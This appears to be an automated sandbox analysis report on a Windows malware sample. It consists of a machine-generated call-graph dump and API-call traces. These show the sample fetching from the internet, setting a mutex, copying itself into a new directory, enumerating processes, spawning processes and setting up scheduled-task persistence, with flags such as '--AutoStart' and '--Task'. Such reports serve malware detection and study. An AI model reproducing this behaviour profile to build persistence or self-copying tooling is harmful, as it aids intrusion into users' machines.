38916->38915 38917 bb8d1e 38916->38917 38918 bb8cff 38916->38918 38917->38595 38918->38916 38918->38917 38920 bc29c9 Sleep 38918->38920 38920->38918 38921->38611 38922->38606 38923->38606 38924->38614 38926 bcaeb8 EncodePointer 38925->38926 38926->38926 38927 bcaed2 38926->38927 38927->38618 38929 b9cf32 _memset __ftell_nolock 38928->38929 38930 b9cf4f InternetOpenW 38929->38930 38931 ba5c10 59 API calls 38930->38931 38932 b9cf8a InternetOpenUrlW 38931->38932 38933 b9cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 38932->38933 38941 b9cfb2 38932->38941 39235 ba56d0 38933->39235 38935 b9d000 38936 ba56d0 59 API calls 38935->38936 38937 b9d049 38936->38937 38937->38941 39254 ba3010 59 API calls 38937->39254 38939 b9d084 38939->38941 39255 ba3010 59 API calls 38939->39255 38941->38624 39260 baccc0 38942->39260 38946 bacc50 59 API calls 38945->38946 38947 bad36c 38946->38947 38948 baa04d 38947->38948 39267 bad740 59 API calls 38947->39267 38948->38636 38948->38641 38951 ba3ad0 GetModuleFileNameW PathRemoveFileSpecW 38950->38951 38952 ba3ab2 38950->38952 38960 ba8400 38951->38960 38953 ba3aba 38952->38953 38954 ba3b00 38952->38954 38955 bb3b4c 59 API calls 38953->38955 39268 bdf23e 59 API calls 2 library calls 38954->39268 38957 ba3ac7 38955->38957 38957->38951 39269 bdf1bb 59 API calls 3 library calls 38957->39269 38961 ba8437 38960->38961 38965 ba8446 38960->38965 38961->38965 39270 ba5d50 59 API calls ___check_float_string 38961->39270 38962 ba84b9 38962->38646 38965->38962 39271 ba8d50 59 API calls 38965->39271 39272 bc1781 38966->39272 39290 bbf7c0 38969->39290 38972 ba1d20 _memset 38973 ba1d40 RegQueryValueExW RegCloseKey 38972->38973 38974 ba1d8f 38973->38974 38974->38974 38975 ba5c10 59 API calls 38974->38975 38976 ba1dbf 38975->38976 38977 ba1e7c 38976->38977 38978 ba1dd1 lstrlenA 38976->38978 38980 ba1e94 6 API calls 38977->38980 39292 ba3520 59 API calls 38978->39292 38982 ba1ef5 UuidCreate UuidToStringW 38980->38982 38981 ba1df1 38983 ba1e08 38981->38983 38984 ba1e3c PathFileExistsW 38981->38984 38985 ba1f36 38982->38985 38983->38981 38983->38984 38984->38977 38986 ba1e52 38984->38986 38987 ba5c10 59 API calls 38985->38987 38988 ba1e6a 38986->38988 38990 ba4690 59 API calls 38986->38990 38989 ba1f59 RpcStringFreeW PathAppendW CreateDirectoryW 38987->38989 38997 ba21d1 38988->38997 38991 ba1f98 38989->38991 38992 ba1fce 38989->38992 38990->38988 38993 ba5c10 59 API calls 38991->38993 38994 ba5c10 59 API calls 38992->38994 38993->38992 38995 ba201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 38994->38995 38996 ba207c _memset 38995->38996 38995->38997 38998 ba2095 6 API calls 38996->38998 38997->38681 38999 ba2109 38998->38999 39000 ba2115 _memset 38998->39000 39293 ba3260 59 API calls 38999->39293 39002 ba2125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 39000->39002 39003 ba21aa GetLastError 39002->39003 39004 ba21b2 39002->39004 39003->38997 39005 ba21c0 WaitForSingleObject 39004->39005 39005->38997 39005->39005 39007 bbf7c0 __ftell_nolock 39006->39007 39008 ba222d 7 API calls 39007->39008 39009 ba228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 39008->39009 39010 ba22bd K32EnumProcesses 39008->39010 39009->39010 39011 ba22df 39010->39011 39012 ba22d3 39010->39012 39013 ba2353 39011->39013 39014 ba22f0 OpenProcess 39011->39014 39012->38652 39013->38652 39015 ba230a K32EnumProcessModules 39014->39015 39016 ba2346 CloseHandle 39014->39016 39015->39016 39017 ba231c K32GetModuleBaseNameW 39015->39017 39016->39013 39016->39014 39294 bb0235 39017->39294 39019 ba233e 39019->39016 39020 ba2345 39019->39020 39020->39016 39022 bb0c62 _malloc 58 API calls 39021->39022 39025 b9ef6e _memset 39022->39025 39023 b9efdc 39023->38659 39024 bb0c62 _malloc 58 API calls 39024->39025 39025->39023 39025->39024 39025->39025 39027 ba3f05 39026->39027 39032 ba3eae 39026->39032 39028 ba3f18 39027->39028 39029 ba3fb1 39027->39029 39031 ba3fbb 39028->39031 39033 ba3f2d 39028->39033 39039 ba3f3d ___check_float_string 39028->39039 39310 bdf23e 59 API calls 2 library calls 39029->39310 39311 bdf23e 59 API calls 2 library calls 39031->39311 39032->39027 39038 ba3ed4 39032->39038 39033->39039 39309 ba6760 59 API calls 2 library calls 39033->39309 39041 ba3ed9 39038->39041 39042 ba3eef 39038->39042 39039->38659 39307 ba3da0 59 API calls ___check_float_string 39041->39307 39308 ba3da0 59 API calls ___check_float_string 39042->39308 39045 ba3ee9 39045->38659 39046 ba3eff 39046->38659 39048 ba46a9 39047->39048 39049 ba478c 39047->39049 39051 ba46e9 39048->39051 39052 ba46b6 39048->39052 39314 bdf26c 59 API calls 3 library calls 39049->39314 39055 ba47a0 39051->39055 39056 ba46f5 39051->39056 39053 ba4796 39052->39053 39054 ba46c2 39052->39054 39315 bdf26c 59 API calls 3 library calls 39053->39315 39312 ba3340 59 API calls _memmove 39054->39312 39316 bdf23e 59 API calls 2 library calls 39055->39316 39068 ba4707 ___check_float_string 39056->39068 39313 ba6950 59 API calls 2 library calls 39056->39313 39065 ba46e0 39065->38675 39068->38675 39071 b9d27d CoInitializeSecurity 39070->39071 39076 b9d276 39070->39076 39072 ba4690 59 API calls 39071->39072 39073 b9d2b8 CoCreateInstance 39072->39073 39074 b9da3c CoUninitialize 39073->39074 39075 b9d2e3 VariantInit VariantInit VariantInit VariantInit 39073->39075 39074->39076 39077 b9d38e VariantClear VariantClear VariantClear VariantClear 39075->39077 39076->38697 39078 b9d3cc CoUninitialize 39077->39078 39079 b9d3e2 39077->39079 39078->39076 39317 b9b140 39079->39317 39082 b9d3f6 39322 b9b1d0 39082->39322 39084 b9d422 39085 b9d43c 39084->39085 39086 b9d426 CoUninitialize 39084->39086 39087 b9b140 60 API calls 39085->39087 39086->39076 39089 b9d449 39087->39089 39090 b9b1d0 SysFreeString 39089->39090 39091 b9d471 39090->39091 39092 b9d4ac 39091->39092 39093 b9d496 CoUninitialize 39091->39093 39095 b9b140 60 API calls 39092->39095 39137 b9d8cf 39092->39137 39093->39076 39096 b9d4d5 39095->39096 39097 b9b1d0 SysFreeString 39096->39097 39098 b9d4fd 39097->39098 39099 b9b140 60 API calls 39098->39099 39098->39137 39100 b9d5ae 39099->39100 39101 b9b1d0 SysFreeString 39100->39101 39102 b9d5d6 39101->39102 39103 b9b140 60 API calls 39102->39103 39102->39137 39104 b9d679 39103->39104 39105 b9b1d0 SysFreeString 39104->39105 39106 b9d6a1 39105->39106 39107 b9b140 60 API calls 39106->39107 39106->39137 39108 b9d6b6 39107->39108 39109 b9b1d0 SysFreeString 39108->39109 39110 b9d6de 39109->39110 39111 b9b140 60 API calls 39110->39111 39110->39137 39112 b9d707 39111->39112 39113 b9b1d0 SysFreeString 39112->39113 39114 b9d72f 39113->39114 39115 b9b140 60 API calls 39114->39115 39114->39137 39116 b9d744 39115->39116 39117 b9b1d0 SysFreeString 39116->39117 39118 b9d76c 39117->39118 39118->39137 39326 bb3aaf GetSystemTimeAsFileTime 39118->39326 39120 b9d77d 39328 bb3551 39120->39328 39125 ba2c40 59 API calls 39126 b9d7b5 39125->39126 39127 ba2900 60 API calls 39126->39127 39128 b9d7c3 39127->39128 39129 b9b140 60 API calls 39128->39129 39130 b9d7db 39129->39130 39131 b9b1d0 SysFreeString 39130->39131 39132 b9d7ff 39131->39132 39133 b9b140 60 API calls 39132->39133 39132->39137 39134 b9d8a3 39133->39134 39135 b9b1d0 SysFreeString 39134->39135 39136 b9d8cb 39135->39136 39136->39137 39138 b9b140 60 API calls 39136->39138 39137->39074 39139 b9d8ea 39138->39139 39140 b9b1d0 SysFreeString 39139->39140 39141 b9d912 39140->39141 39141->39137 39336 b9b400 SysAllocString 39141->39336 39143 b9d936 VariantInit VariantInit 39144 b9b140 60 API calls 39143->39144 39145 b9d985 39144->39145 39146 b9b1d0 SysFreeString 39145->39146 39147 b9d9e7 VariantClear VariantClear VariantClear 39146->39147 39148 b9da10 39147->39148 39149 b9da46 CoUninitialize 39147->39149 39340 bb052a 78 API calls __snprintf_l 39148->39340 39149->39076 39152->38630 39153->38673 39154->38674 39155->38711 39156->38715 39158 ba5c1e 39157->39158 39159 ba5c66 39157->39159 39158->39159 39168 ba5c45 39158->39168 39160 ba5cff 39159->39160 39161 ba5c76 39159->39161 39497 bdf23e 59 API calls 2 library calls 39160->39497 39165 ba5c88 ___check_float_string 39161->39165 39496 ba6950 59 API calls 2 library calls 39161->39496 39165->38719 39170 ba4690 59 API calls 39168->39170 39171 ba5c60 39170->39171 39171->38719 39172->38722 39173->38724 39174->38730 39175->38740 39177 ba3a90 59 API calls 39176->39177 39178 ba294c MultiByteToWideChar 39177->39178 39179 ba8400 59 API calls 39178->39179 39180 ba298d 39179->39180 39180->38743 39181->38748 39182->38756 39183->38762 39184->38766 39185->38770 39186->38774 39187->38778 39188->38782 39189->38786 39190->38788 39191->38790 39192->38792 39193->38794 39194->38796 39195->38798 39196->38800 39197->38802 39198->38804 39199->38806 39200->38808 39201->38810 39202->38812 39203->38814 39204->38816 39205->38818 39207 ba2c5f 39206->39207 39208 ba2c71 39206->39208 39209 ba56d0 59 API calls 39207->39209 39211 ba56d0 59 API calls 39208->39211 39210 ba2c6a 39209->39210 39210->38823 39212 ba2c8a 39211->39212 39212->38823 39213->38825 39214->38848 39215->38848 39216->38848 39217->38829 39218->38831 39219->38834 39220->38837 39221->38840 39222->38842 39223->38845 39224->38850 39225->38852 39226->38876 39227->38876 39228->38876 39229->38876 39230->38876 39231->38876 39498 baf130 218 API calls _LanguageEnumProc@4 39231->39498 39232->38856 39499 bafd80 64 API calls 39232->39499 39236 ba5735 39235->39236 39241 ba56de 39235->39241 39237 ba573e 39236->39237 39238 ba57bc 39236->39238 39244 ba5750 ___check_float_string 39237->39244 39258 ba6760 59 API calls 2 library calls 39237->39258 39259 bdf23e 59 API calls 2 library calls 39238->39259 39241->39236 39246 ba5704 39241->39246 39244->38935 39248 ba5709 39246->39248 39249 ba571f 39246->39249 39256 ba3ff0 59 API calls ___check_float_string 39248->39256 39257 ba3ff0 59 API calls ___check_float_string 39249->39257 39252 ba5719 39252->38935 39253 ba572f 39253->38935 39254->38939 39255->38941 39256->39252 39257->39253 39258->39244 39261 bb3b4c 59 API calls 39260->39261 39262 baccca 39261->39262 39265 baa00a 39262->39265 39266 bdf1bb 59 API calls 3 library calls 39262->39266 39265->38633 39265->38634 39267->38948 39270->38965 39271->38965 39275 bc1570 39272->39275 39278 bc1580 39275->39278 39276 bc1586 39286 bb5208 58 API calls __getptd_noexit 39276->39286 39278->39276 39282 bc15ae 39278->39282 39279 bc158b 39287 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 39279->39287 39285 bc15cf wcstoxq 39282->39285 39288 bbe883 GetStringTypeW 39282->39288 39284 baa36e lstrcpyW lstrcpyW 39284->38667 39285->39284 39289 bb5208 58 API calls __getptd_noexit 39285->39289 39286->39279 39287->39284 39288->39282 39289->39284 39291 ba1cf2 RegOpenKeyExW 39290->39291 39291->38972 39291->38997 39292->38981 39293->39000 39295 bb0241 39294->39295 39296 bb02b6 39294->39296 39303 bb0266 39295->39303 39304 bb5208 58 API calls __getptd_noexit 39295->39304 39306 bb02c8 60 API calls 3 library calls 39296->39306 39299 bb02c3 39299->39019 39300 bb024d 39305 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 39300->39305 39302 bb0258 39302->39019 39303->39019 39304->39300 39305->39302 39306->39299 39307->39045 39308->39046 39309->39039 39312->39065 39313->39068 39314->39053 39315->39055 39318 bb3b4c 59 API calls 39317->39318 39319 b9b164 39318->39319 39320 b9b177 SysAllocString 39319->39320 39321 b9b194 39319->39321 39320->39321 39321->39082 39323 b9b1de 39322->39323 39325 b9b202 39322->39325 39324 b9b1f5 SysFreeString 39323->39324 39323->39325 39324->39325 39325->39084 39327 bb3add __aulldiv 39326->39327 39327->39120 39341 bc035d 39328->39341 39330 bb355a 39332 b9d78f 39330->39332 39349 bb3576 39330->39349 39333 bb28e0 39332->39333 39451 bb279f 39333->39451 39337 b9b41d 39336->39337 39338 b9b423 39336->39338 39337->39143 39339 b9b42d VariantClear 39338->39339 39339->39143 39340->39137 39382 bb501f 58 API calls 4 library calls 39341->39382 39343 bc0363 39344 bc0369 39343->39344 39346 bc038d 39343->39346 39347 bb8cde __malloc_crt 58 API calls 39343->39347 39344->39346 39383 bb5208 58 API calls __getptd_noexit 39344->39383 39346->39330 39347->39344 39348 bc036e 39348->39330 39350 bb35a9 _memset 39349->39350 39351 bb3591 39349->39351 39350->39351 39359 bb35c0 39350->39359 39392 bb5208 58 API calls __getptd_noexit 39351->39392 39353 bb3596 39393 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 39353->39393 39355 bb35cb 39394 bb5208 58 API calls __getptd_noexit 39355->39394 39356 bb35e9 39384 bbfb64 39356->39384 39359->39355 39359->39356 39360 bb35ee 39395 bbf803 58 API calls __fclose_nolock 39360->39395 39362 bb35f7 39363 bb37e5 39362->39363 39396 bbf82d 58 API calls __fclose_nolock 39362->39396 39409 bb42fd 8 API calls 2 library calls 39363->39409 39366 bb37ef 39367 bb3609 39367->39363 39397 bbf857 39367->39397 39369 bb361b 39369->39363 39370 bb3624 39369->39370 39371 bb369b 39370->39371 39373 bb3637 39370->39373 39407 bbf939 58 API calls 4 library calls 39371->39407 39404 bbf939 58 API calls 4 library calls 39373->39404 39374 bb36a2 39381 bb35a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 39374->39381 39408 bbfbb4 58 API calls 4 library calls 39374->39408 39376 bb364f 39376->39381 39405 bbfbb4 58 API calls 4 library calls 39376->39405 39379 bb3668 39379->39381 39406 bbf939 58 API calls 4 library calls 39379->39406 39381->39332 39382->39343 39383->39348 39385 bbfb70 _fgetws 39384->39385 39386 bbfba5 _fgetws 39385->39386 39387 bb8af7 __lock 58 API calls 39385->39387 39386->39360 39388 bbfb80 39387->39388 39391 bbfb93 39388->39391 39410 bbfe47 39388->39410 39439 bbfbab LeaveCriticalSection _doexit 39391->39439 39392->39353 39393->39381 39394->39381 39395->39362 39396->39367 39398 bbf861 39397->39398 39399 bbf876 39397->39399 39449 bb5208 58 API calls __getptd_noexit 39398->39449 39399->39369 39401 bbf866 39450 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 39401->39450 39403 bbf871 39403->39369 39404->39376 39405->39379 39406->39381 39407->39374 39408->39381 39409->39366 39411 bbfe53 _fgetws 39410->39411 39412 bb8af7 __lock 58 API calls 39411->39412 39413 bbfe71 _W_expandtime 39412->39413 39414 bbf857 __tzset_nolock 58 API calls 39413->39414 39415 bbfe86 39414->39415 39429 bbff25 __tzset_nolock __isindst_nolock 39415->39429 39440 bbf803 58 API calls __fclose_nolock 39415->39440 39418 bbfe98 39418->39429 39441 bbf82d 58 API calls __fclose_nolock 39418->39441 39419 bbff71 GetTimeZoneInformation 39419->39429 39422 bbfeaa 39422->39429 39442 bc3f99 58 API calls 2 library calls 39422->39442 39424 bbffd8 WideCharToMultiByte 39424->39429 39425 bbfeb8 39443 bd1667 78 API calls 3 library calls 39425->39443 39427 bc0010 WideCharToMultiByte 39427->39429 39428 bbfed9 type_info::operator== 39428->39429 39431 bbff0c _strlen 39428->39431 39444 bb0bed 58 API calls 2 library calls 39428->39444 39429->39419 39429->39424 39429->39427 39436 bcff8e 58 API calls __tzset_nolock 39429->39436 39437 bc0157 __tzset_nolock _fgetws __isindst_nolock 39429->39437 39438 bb3c2d 61 API calls UnDecorator::getZName 39429->39438 39446 bb42fd 8 API calls 2 library calls 39429->39446 39447 bb0bed 58 API calls 2 library calls 39429->39447 39448 bc00d7 LeaveCriticalSection _doexit 39429->39448 39432 bb8cde __malloc_crt 58 API calls 39431->39432 39434 bbff1a _strlen 39432->39434 39434->39429 39445 bbc0fd 58 API calls __fclose_nolock 39434->39445 39436->39429 39437->39391 39438->39429 39439->39386 39440->39418 39441->39422 39442->39425 39443->39428 39444->39431 39445->39429 39446->39429 39447->39429 39448->39429 39449->39401 39450->39403 39478 bb019c 39451->39478 39453 bb27d4 39486 bb5208 58 API calls __getptd_noexit 39453->39486 39456 bb27d9 39487 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 39456->39487 39457 bb27e9 MultiByteToWideChar 39460 bb2815 39457->39460 39461 bb2804 GetLastError 39457->39461 39459 b9d7a3 39459->39125 39462 bb8cde __malloc_crt 58 API calls 39460->39462 39488 bb51e7 58 API calls 3 library calls 39461->39488 39465 bb281d 39462->39465 39464 bb2810 39491 bb0bed 58 API calls 2 library calls 39464->39491 39465->39464 39466 bb2825 MultiByteToWideChar 39465->39466 39466->39461 39468 bb283f 39466->39468 39470 bb8cde __malloc_crt 58 API calls 39468->39470 39469 bb28a0 39492 bb0bed 58 API calls 2 library calls 39469->39492 39472 bb284a 39470->39472 39472->39464 39489 bbd51e 88 API calls 3 library calls 39472->39489 39474 bb2866 39474->39464 39475 bb286f WideCharToMultiByte 39474->39475 39475->39464 39476 bb288b GetLastError 39475->39476 39490 bb51e7 58 API calls 3 library calls 39476->39490 39479 bb01ad 39478->39479 39480 bb01fa 39478->39480 39493 bb5007 58 API calls 2 library calls 39479->39493 39480->39453 39480->39457 39482 bb01b3 39483 bb01da 39482->39483 39494 bb45dc 58 API calls 6 library calls 39482->39494 39483->39480 39495 bb495e 58 API calls 6 library calls 39483->39495 39486->39456 39487->39459 39488->39464 39489->39474 39490->39464 39491->39469 39492->39459 39493->39482 39494->39483 39495->39480 39496->39165 39503 bb7e1a _fgetws 39502->39503 39504 bb8af7 __lock 51 API calls 39503->39504 39505 bb7e21 39504->39505 39506 bb7eda __cinit 39505->39506 39507 bb7e4f DecodePointer 39505->39507 39522 bb7f28 39506->39522 39507->39506 39509 bb7e66 DecodePointer 39507->39509 39516 bb7e76 39509->39516 39511 bb7f37 _fgetws 39511->38879 39513 bb7e83 EncodePointer 39513->39516 39514 bb7f1f 39515 bb7b0b __mtinitlocknum 3 API calls 39514->39515 39517 bb7f28 39515->39517 39516->39506 39516->39513 39518 bb7e93 DecodePointer EncodePointer 39516->39518 39519 bb7f35 39517->39519 39527 bb8c81 LeaveCriticalSection 39517->39527 39520 bb7ea5 DecodePointer DecodePointer 39518->39520 39519->38879 39520->39516 39523 bb7f2e 39522->39523 39525 bb7f08 39522->39525 39528 bb8c81 LeaveCriticalSection 39523->39528 39525->39511 39526 bb8c81 LeaveCriticalSection 39525->39526 39526->39514 39527->39519 39528->39525

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Function 00BA9F90 Relevance: 167.8, APIs: 65, Strings: 30, Instructions: 1565COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00B9CF10: _memset.LIBCMT ref: 00B9CF4A
                                                                                                                                                                          • Part of subcall function 00B9CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00B9CF5F
                                                                                                                                                                          • Part of subcall function 00B9CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00B9CFA6
                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00BA9FC4
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BA9FD2
                                                                                                                                                                        • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00BA9FDA
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BA9FE4
                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,00DD31C0,?), ref: 00BAA0BB
                                                                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BAA0C2
                                                                                                                                                                        • GetCommandLineW.KERNEL32(?,?), ref: 00BAA161
                                                                                                                                                                          • Part of subcall function 00BA24E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00BA24FE
                                                                                                                                                                          • Part of subcall function 00BA24E0: GetLastError.KERNEL32 ref: 00BA2509
                                                                                                                                                                          • Part of subcall function 00BA24E0: CloseHandle.KERNEL32 ref: 00BA251C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                                                                                        • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$list<T> too long${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                                                                        • API String ID: 2957410896-1224459563
                                                                                                                                                                        • Opcode ID: e65c9f2ee7c8f04e2b4ee5fc8fec1db99d89278082bf086e094059920450f1ce
                                                                                                                                                                        • Instruction ID: 73941414d16913fe58f7feb174d1db90b03984ebbd884bec1ab251982b1e4f32
                                                                                                                                                                        • Opcode Fuzzy Hash: e65c9f2ee7c8f04e2b4ee5fc8fec1db99d89278082bf086e094059920450f1ce
                                                                                                                                                                        • Instruction Fuzzy Hash: 35D2C670508341AFDB14EF24C895B9FB7E4FF96704F0009ADF48597292EB719A49CBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9D240 Relevance: 58.5, APIs: 25, Strings: 8, Instructions: 702comCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 688 b9d240-b9d274 CoInitialize 689 b9d27d-b9d2dd CoInitializeSecurity call ba4690 CoCreateInstance 688->689 690 b9d276-b9d278 688->690 697 b9da3c-b9da44 CoUninitialize 689->697 698 b9d2e3-b9d3ca VariantInit * 4 VariantClear * 4 689->698 691 b9da8e-b9da92 690->691 693 b9da9f-b9dab1 691->693 694 b9da94-b9da9c call bb2587 691->694 694->693 700 b9da69-b9da6d 697->700 705 b9d3cc-b9d3dd CoUninitialize 698->705 706 b9d3e2-b9d3fe call b9b140 698->706 701 b9da7a-b9da8a 700->701 702 b9da6f-b9da77 call bb2587 700->702 701->691 702->701 705->700 711 b9d400-b9d402 706->711 712 b9d404 706->712 713 b9d406-b9d424 call b9b1d0 711->713 712->713 717 b9d43c-b9d451 call b9b140 713->717 718 b9d426-b9d437 CoUninitialize 713->718 722 b9d453-b9d455 717->722 723 b9d457 717->723 718->700 724 b9d459-b9d494 call b9b1d0 722->724 723->724 730 b9d4ac-b9d4c2 724->730 731 b9d496-b9d4a7 CoUninitialize 724->731 734 b9d4c8-b9d4dd call b9b140 730->734 735 b9da2a-b9da37 730->735 731->700 739 b9d4df-b9d4e1 734->739 740 b9d4e3 734->740 735->697 741 b9d4e5-b9d508 call b9b1d0 739->741 740->741 741->735 746 b9d50e-b9d524 741->746 746->735 748 b9d52a-b9d542 746->748 748->735 751 b9d548-b9d55e 748->751 751->735 753 b9d564-b9d57c 751->753 753->735 756 b9d582-b9d59b 753->756 756->735 758 b9d5a1-b9d5b6 call b9b140 756->758 761 b9d5b8-b9d5ba 758->761 762 b9d5bc 758->762 763 b9d5be-b9d5e1 call b9b1d0 761->763 762->763 763->735 768 b9d5e7-b9d5fd 763->768 768->735 770 b9d603-b9d626 768->770 770->735 773 b9d62c-b9d651 770->773 773->735 776 b9d657-b9d666 773->776 776->735 778 b9d66c-b9d681 call b9b140 776->778 781 b9d683-b9d685 778->781 782 b9d687 778->782 783 b9d689-b9d6a3 call b9b1d0 781->783 782->783 783->735 787 b9d6a9-b9d6be call b9b140 783->787 790 b9d6c0-b9d6c2 787->790 791 b9d6c4 787->791 792 b9d6c6-b9d6e0 call b9b1d0 790->792 791->792 792->735 796 b9d6e6-b9d6f4 792->796 796->735 798 b9d6fa-b9d70f call b9b140 796->798 801 b9d711-b9d713 798->801 802 b9d715 798->802 803 b9d717-b9d731 call b9b1d0 801->803 802->803 803->735 807 b9d737-b9d74c call b9b140 803->807 810 b9d74e-b9d750 807->810 811 b9d752 807->811 812 b9d754-b9d76e call b9b1d0 810->812 811->812 812->735 816 b9d774-b9d7ce call bb3aaf call bb3551 call bb28e0 call ba2c40 call ba2900 812->816 827 b9d7d0 816->827 828 b9d7d2-b9d7e3 call b9b140 816->828 827->828 831 b9d7e9 828->831 832 b9d7e5-b9d7e7 828->832 833 b9d7eb-b9d819 call b9b1d0 call ba3210 831->833 832->833 833->735 840 b9d81f-b9d835 833->840 840->735 842 b9d83b-b9d85e 840->842 842->735 845 b9d864-b9d889 842->845 845->735 848 b9d88f-b9d8ab call b9b140 845->848 851 b9d8ad-b9d8af 848->851 852 b9d8b1 848->852 853 b9d8b3-b9d8cd call b9b1d0 851->853 852->853 857 b9d8dd-b9d8f2 call b9b140 853->857 858 b9d8cf-b9d8d8 853->858 862 b9d8f8 857->862 863 b9d8f4-b9d8f6 857->863 858->735 864 b9d8fa-b9d91d call b9b1d0 862->864 863->864 864->735 869 b9d923-b9d98d call b9b400 VariantInit * 2 call b9b140 864->869 874 b9d98f-b9d991 869->874 875 b9d993 869->875 876 b9d995-b9da0e call b9b1d0 VariantClear * 3 874->876 875->876 880 b9da10-b9da27 call bb052a 876->880 881 b9da46-b9da67 CoUninitialize 876->881 880->735 881->700
                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00B9D26C
                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00B9D28F
                                                                                                                                                                        • CoCreateInstance.OLE32(00C6506C,00000000,00000001,00C64FEC,?,?,00000000,000000FF), ref: 00B9D2D5
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00B9D2F0
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00B9D309
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00B9D322
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00B9D33B
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00B9D397
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00B9D3A4
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00B9D3B1
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00B9D3C2
                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00B9D3D5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
